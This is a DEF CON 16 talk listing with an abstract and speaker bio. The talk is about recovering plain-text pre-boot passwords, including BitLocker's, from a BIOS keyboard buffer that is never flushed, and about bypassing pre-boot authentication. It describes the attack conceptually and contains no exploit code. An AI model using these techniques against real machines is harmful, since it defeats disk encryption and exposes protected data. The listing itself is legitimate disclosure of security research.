Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software)

Presented at DEF CON 16 (2008), Aug. 10, 2008, 1 p.m. (50 minutes)

Pre-boot authentication software, in particular full hard disk encryption software, play a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high value pre-boot authentication software, including the latest Microsoft disk encryption technology : Microsoft Vista's Bitlocker, with TPM chip enabled. Because Pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interruptions responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input including plain text passwords remains in memory at a given physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms under x86 architectures. Unlike current academic research aiming at extracting information from the RAM, our practical methodology does not require any physical access to the computer to extract plain text passwords from the physical memory. In a second part, we will present how this information leakage combined with usage of the BIOS API without careful initialization of the BIOS keyboard buffer can lead to computer reboot without console access and full security bypass of the pre-boot authentication pin if an attacker has enough privileges to modify the bootloader. Other related work include information leakage from CPU caches, reading physical memory thanks to firewire and switching CPU modes.

Presenters:

• Jonathan Brossard / endrazine - Lead Security Researcher, Iviz   as Jonanthan Brossard
  Jonanthan Brossard is French,and has recently moved to India to build and lead the research and exploitation team of Iviz (http://www.ivizindia.com/iviz/aboutus.html). Jonathan's daily activities involve exploit writing, reverse engineering, code auditing and research in disruptive low level hacking methodologies. Before moving to India, Jonathan worked as a security researcher in the Defense area in France for Sagem Defense Securite, where he designed and patented new protection schemes for protecting applications against reverse engineering under GNU/Linux architectures. Prior to that position, He has also worked in French pioneer pentesting consulting company Edelweb. Therefore he has experience with both ends of the security industry... During college, Jonathan was employed as a network administrator of one of the major school network in France, which gave him a strong taste for networking and network security. Jonathan started getting interested with low level security issues more than 10 years ago, when he learnt x86 asm under MS-DOS. Many things have changed since those good old times of real mode OSes, but there is still room for surprises... Low level attacks involving deep knowledge of computers internals are not dead... just read the paper ;) Jonathan would also like to mention his ties to excellent security research groups such as pulltheplug.org and blacksecurity.org :this is where public information ends and where security research begins...

Links:

• https://defcon.org/html/defcon-16/dc-16-speakers.html#Brossard

Similar Presentations:

• DEF CON 30 (2022) / One Bootloader to Load Them All
• Black Hat USA 2013 / BIOS Security
• DEF CON 22 (2014) / Summary of Attacks Against BIOS and Secure Boot